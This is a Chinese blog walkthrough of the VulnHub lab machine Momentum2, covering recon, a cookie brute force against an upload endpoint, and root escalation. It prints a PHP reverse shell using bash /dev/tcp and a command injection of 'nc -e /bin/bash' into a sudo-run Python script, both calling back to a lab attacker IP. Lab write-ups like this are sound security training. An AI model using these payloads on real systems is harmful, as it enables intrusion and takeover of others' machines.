vulnhub系列:Momentum2

最新推荐文章于 2024-08-16 15:15:00 发布
最新推荐文章于 2024-08-16 15:15:00 发布
阅读量391 收藏 10
点赞数 3
分类专栏: vulnhub系列 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jq_j37/article/details/141199988
版权

vulnhub系列:Momentum2

靶机下载

一、信息收集

nmap扫描C段存活

nmap 192.168.23.0/24

目标地址为192.168.23.132

01扫描IP

nmap扫描端口

nmap 192.168.23.132

发现开放端口:22、80

02端口扫描

目录扫描

python3 dirsearch.py -u http://192.168.23.132

扫描发现目录:js、manual

发现文件:ajax.php、dashboard.html、/manual/index.html

04目录扫描

扫描js目录发现main.js

04扫描js目录

拼接dashboard.html发现文件上传功能

05发现文件上传页面

尝试上传shell文件,上传失败

06上传失败

抓包尝试绕过,发现只有txt可以上传

06抓包发现txt可以上传

f12发现文件好像上传到了owls目录

06f12查看,发现txt存在了Owls目录

拼接,可以看到我们上传的txt文件

06f12查看,发现txt存在了Owls目录02

拼接main.js,发现POST请求提交到ajax.php文件

07查看js文件

拼接ajsx.php没有发现,卡在这里,搜了一下发现有.bak文件,下载ajax.php.bak备份文件,查看内容

08下载查看apk文件

文件中提到,需要输入cookie和数值val1d,cookie的最后一位是大写字母

抓包把文件中的cookie写到数据包中,并爆破最后一位大写字母

09抓包加cookie,爆破

爆破发现字母为R,响应包回显为1,成功写入shell.php

10爆破发现字母为R

看一下写入的文件

11写入php文件

二、getshell

上传反弹shell文件

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.23.133/4444 0>&1'");?>

kali开启监听

nc -lvnp 4444

image-20240814195340402

访问shell文件,成功反弹shell

image-20240814195404248

三、提权

查看当前权限,没有可利用的

sudo -l

在 /home/athena 下发现两个文件

image-20240814200938016

user.txt,发现一个flag

image-20240814200955047

password-reminder.txt,得到密码,[Asterisk]代表符号*

myvulnerableapp*

image-20240814201025999

切换到athena用户

su athena

image-20240814201217376

使用python提升交互性

python -c "import pty;pty.spawn('/bin/bash')"

image-20240814201257238

查看当前权限

sudo -l

image-20240814201340774

可以看到 /home/team-tasks/cookie-gen.py 文件能以root权限执行,查看文件内容

image-20240814201542736

脚本接收输入的值作为seed,生成一个cookie,构造一个命令行并执行,那么在输入seed时构造反弹语句即可

kali开启监听

nc -lvnp 6666

image-20240814203543293

执行文件,输入反弹语句

sudo /usr/bin/python3 /home/team-tasks/cookie-gen.py

;nc -e /bin/bash 192.168.23.133 6666;

image-20240814203631015

成功反弹shell,提权成功

image-20240814203649094

在 /root 下发现 第二个flag

image-20240814203726472

三天三夜睡不着
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub靶场-Momentum: 2
hxync的博客
08-10 572
靶场下载地址:Momentum: 2 下好之后导入virtualbox启动 照例先扫一下主机 扫到靶机的ip地址为192.168.1.15 扫一下端口,开放了22和80端口 浏览器访问一下80端口 发现没有什么有用的信息,源码也看了一下,也没什么有用的信息 dirbuster扫一下目录 发现了一个文件上传的页面 一个备份文件 一个js文件 代码内容大概是当cookie存在且值为后面给出的那个字符串,注释部分有说明还需在字符串后面加一个大写字母,再用POST提交一个secure参数,参数的值
网站:Momentum Mod的主要网站
02-04
Momentum Mod是基于源引擎构建的独立游戏,旨在集中化CS:S,CS:GO和TF2中的移动游戏类型。 这是Momentum Mod主网站的存储库,它是的中央枢纽和扩展。 Momentum主站点的前端充当游戏的扩展,允许玩家通过Steam...
vulnhub靶机:Momentum-2
weixin_68416970的博客
05-28 1140
Momentum-2是一个中等难度的渗透测试靶机,主要涉及信息收集、漏洞发现、文件上传漏洞利用、反弹Shell、SSH登入以及提权等步骤。
VulnHub靶机_MOMENTUM: 1
plant1234的博客
04-09 117
信息收集 扫描IP nmap -sP 192.168.229.0/24 获取靶机信息 nmap -sS -sV -T5 -A -p- 192.168.229.179 发现开启22端口和80端口 访问80端口得到: 查找漏洞 通常查看源码 访问main.js有有用信息: 首先是: opus-details.php?id="+str 是一个php页面,在url访问看看能不能访问得到: 发现能成功访问,请求参数得到: 发现是一个XSS漏洞 XSS漏洞 试试能不能获取cookie: playloa
vulnhub--Momentum:2
venu_s的博客
07-09 614
靶机介绍 difficult:medium keywords:curl、bash、code review download:https://www.vulnhub.com/entry/momentum-2,702/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.187.0/24 端口扫描,开放了22和80端口 目录扫描 gobuster dir -u http://192.168.187.171/ -x html,php,bak,txt --wordlist /usr
VulnHub靶机_MOMENTUM: 2
学术渣渣的博客
09-05 703
文章目录靶机介绍渗透过程靶机IP获取端口扫描信息收集信息1信息2burpsuite抓包改包 靶机介绍 这个是Momentum系列的第二个靶机,第一个靶机详见:Momentum:1 下载地址:http://www.vulnhub.com/entry/momentum-2,702/ 难度:中等 描述:关键词curl, bash, code review 渗透过程 靶机IP获取 靶机的IP为192.168.1.105。 arp-scan -l 端口扫描 靶机开放了22和80端口。 nmap -A -T4 -p
VulnHub-MOMENTUM: 1靶机
NeverForgetCX的博客
03-03 4597
前言: 在VulnHub官网上下载好MOMENTUM: 1靶机,并直接用VM导入打开。 攻击机kali:192.168.2.87 靶机IP:192.168.2.92 信息收集: 扫描靶机ip; arp-scan -l 得到靶机ip; 扫描靶机开放的端口;看见开放了22,80端口。 访问80端口http://192.168.2.92,得到一个有四张图片的网站,话不多说...
Vulnhub: Momentum: 1靶机
qq_43884092的博客
07-17 140
查看目标80端口的main.js发现信息,目标`opus-details.php?id=`存在xss,利用xss获取cookie,再对cookie进行aes解密,目标存在redis服务,在redis数据库中找到root的密码
靶场练习第二十二天~vulnhub靶场之Momentum-2
qq_57976347的博客
02-20 678
一、准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端口和协议:nmap -sV 192.168.101.114 二、信息收集 1.使用gobuster,寻找隐藏的网站 gobuster dir -u http://192.168.101.114/ -x html,php,txt,php.bak,bak -w /usr/share
Currency Converter: Momentum Strategy-crx插件
04-04
2. **自定义转换**:用户可以输入任意数值,插件会即时使用最新的汇率进行转换。这适用于需要进行货币计算的情况,比如计算旅行预算、跨境支付或是国际贸易中的报价。 3. **多货币支持**:此插件支持多种货币的转换...
推进:Momentum Chrome扩展程序克隆
02-13
推进力Momentum Chrome扩展程序克隆建造和设计使用HTML CSS JavaScript用法运行扩展的步骤: 在您的Google chrome网络浏览器中打开chrome:// extensions /。 下载存储库的zip文件并解压缩(或仅克隆存储库)。 在...
productivity:Momentum Chrome扩展程序的自定义版本
05-03
生产率++,一种免费的极简解决方案,旨在优化您的工作。 :information: 关于 你好! 这是我个人对新的Tab生产力chrome扩展程序的看法。 基于Pomodoro方法和我的极简主义思想,此扩展将把您的工作流程提升到一个全新...
game:Momentum Mod - 独立源运动 Speedrunning(请阅读自述文件)
08-05
Momentum Mod 是一款基于 Source 引擎的免费独立游戏,集中了反恐精英、半条命、军团要塞和泰坦陨落等游戏中的主要运动游戏类型。 团队更新 Momentum Mod 获得了 Valve 的引擎访问权限! 您可以在一切意味着,但这...
怎么在网络攻击中屹立不倒
dexun123的博客
08-12 687
在当今蓬勃发展的网络游戏产业中,服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
Animetronic - hackmyvm
tanbinn的博客
08-12 473
hackmyvm的Animetronic靶场
网络协议八 网络安全相关
hunandede的博客
08-12 431
ARP欺骗的防护原理。
网络安全(黑客)自学
白帽子凯哥聊黑客
08-16 767
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
2024年入职/转行网络安全,该如何规划?_网络安全职业规划
最新发布
2401_85023531的博客
08-16 1279
前段时间,知名机构麦可思研究院发布了《2022年中国本科生就业报告》,其中详细列出近五年的本科绿牌专业,其中,信息安全位列第一。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值